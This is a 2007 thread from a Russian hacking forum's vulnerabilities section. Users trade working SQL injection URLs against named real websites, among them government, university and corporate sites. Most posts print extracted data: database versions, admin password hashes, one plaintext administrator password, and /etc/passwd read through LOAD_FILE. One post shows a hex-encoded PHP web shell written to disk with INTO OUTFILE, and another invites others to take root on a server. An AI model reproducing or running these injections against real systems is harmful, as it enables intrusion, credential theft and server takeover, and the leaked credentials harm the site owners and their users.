ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2461  
Старый 10.06.2007, 02:57
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

www.contagem.mg.gov.br
version, database, user
Код:
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(concat_ws(0x3b,user(),database(),version())+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
etc/passwd
Код:
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(LOAD_FILE(0x2f6574632f706173737764)+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
shell
Код:
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(0x3c3f7068702073797374656d28245f4745545b636d645d293b203f3e+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user+into_outfile+/*
www.zjda.gov.cn
Код:
http://www.zjda.gov.cn/misc.php?xname=CP0GHU0&dname=FM01G11&xpos=1'+union+select+concat_ws(0x3b,user(),database(),version())/*&op=recommend

Последний раз редактировалось Isis; 10.06.2007 в 03:18..
 
Ответить с цитированием

  #2462  
Старый 10.06.2007, 12:31
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

education.apple.com
Цитата:
http://education.apple.com/education/ilife/subject_template.php?subject_id=-16+union+select+1,2,3,4,5,6,7,convert(concat_ws(ch ar(58),user,password,host)+using+latin1),9,10,11,1 2,13,14,15,16+from+mysql.user+limit+3,1
admin:*4ACFE3202A5FF5CF467898FC58AAB1D615029441:%
 
Ответить с цитированием

  #2463  
Старый 10.06.2007, 14:01
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Код:
http://www.toraks.org.tr/journal/text.php3?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+articles/*
Код:
http://www.tutak.bel.tr/index2.php?id=-2+union+select+1,2,3,concat(user,char(58),pass),5+from+user+limit+0,1/*

Последний раз редактировалось _Pantera_; 10.06.2007 в 14:54..
 
Ответить с цитированием

  #2464  
Старый 10.06.2007, 15:02
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
http://www.pvc.maricopa.edu/news/news_article.php?loc=-107+union+select+1,2,3,4,concat_ws(0x3a,VERSION(), DATABASE(),USER()),6,7,8,9,10,11,12,13
Дальше лень
 
Ответить с цитированием

  #2465  
Старый 10.06.2007, 17:16
Аватар для Пчел
Пчел
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698

Репутация: 20
По умолчанию

Алкогольный портал Госалкогольинспекции РТ

Код:
http://www.tatalc.ru/index.php?page=7&idnews=-12345+union+select+1,2,3,4,5,concat(name,char(58),passwd),7,8,   9,10,11,12,13,14,15,16,17,18+from+users+limit+0,1/*
USER: root@localhost
DATABASE: tatalc
VERSION: 4.0.24

Пароли в открытом виде
Администратор:N58y0Aa
 
Ответить с цитированием

sql
  #2466  
Старый 10.06.2007, 17:33
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

http://www.stplus.ru/
mysql 5
admins : id_admin,login,password,name
Цитата:
http://www.stplus.ru/content.php?id=-14+union+select+1,2,concat_ws(0x203a20,id_admin,lo gin,password,name,wrap),4+from+admins+limit+1,1/*
avk : adafff23fe27d62fa9d5220cc0b3a8ea : assassin
a_volkov : 00a809937eddc44521da9521269e75c6 : emma
 
Ответить с цитированием

  #2467  
Старый 10.06.2007, 17:58
Аватар для Пчел
Пчел
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698

Репутация: 20
По умолчанию

Сайт какой-то певицы.

Код:
http://www.alesya.by/interview.php?act=intview&int=-123456+union+select+1,2,3,4,3/*
USER: syabry@localhost
DATABASE: syabry_xmb1
VERSION: 4.1.21-standard


КАРЕЛЬСКАЯ РЕГИОНАЛЬНАЯ ОБЩЕСТВЕННАЯ ПРИРОДООХРАННАЯ ОРГАНИЗАЦИЯ

Код:
http://spok.onego.ru/index.php?lang=en&page=show.php&id=-12345+union+select+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14+from+INFORMATION_SCHE  MA.TABLES+limit+0,1/*
USER: spok_office_user@home.onego.ru
DATABASE: spok_office_db
VERSION: 5.0.37
 
Ответить с цитированием

  #2468  
Старый 10.06.2007, 20:26
Аватар для gormet
gormet
Познающий
Регистрация: 31.01.2007
Сообщений: 52
Провел на форуме:
169212

Репутация: 101
Отправить сообщение для gormet с помощью ICQ
По умолчанию

_http://www.mediaclub.kz/news.php?catid=-1+union+select+1,database(),3/*

_http://www.db-central.de/content_manager/page.php?ID=-1+union+select+1,2,3,4,5,6,7/*
 
Ответить с цитированием

  #2469  
Старый 10.06.2007, 23:58
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

www2.tccgc.gov.tw
version(), user(), database()
Код:
http://www2.tccgc.gov.tw/art/community_person.php?id=-1+union+select+1,user(),database(),4,LOAD_FILE(0x2f6574632f706173737764),version(),7,8,9,10,11,12,13,14,15+from+mysql.user/*
Сайт стоит на винде у обычного пользователя....
Есть доступ к mysql.user
Рутайте
 
Ответить с цитированием

sql
  #2470  
Старый 11.06.2007, 01:28
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

Камеди клаб

http://www.rucomedy.com/

уязвимость: http://www.rucomedy.com/search.php?showid=1&serie=90'

-> mysql 5
вывод без лимита, поглядел, наиболее интересные таблицы - wp_users и users

->таблицы и столбцы:
Цитата:
http://www.rucomedy.com/search.php?showid=1&serie=-90+union+select+1,2,3,4,aes_decrypt(aes_encrypt(co ncat_ws(0x203a20,table_schema,table_name,column_na me),0x55),0x55),6,7,8,9+from+information_schema.co lumns/*
wp_users
Цитата:
http://www.rucomedy.com/search.php?showid=1&serie=-90+union+select+1,2,3,aes_decrypt(aes_encrypt(conc at_ws(0x3a,ID,user_login,user_pass,user_email,user _url,user_activation_key,user_status,display_name) ,0x55),0x55),5,6,7,8,9+from+rucomedy_blog.wp_users/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ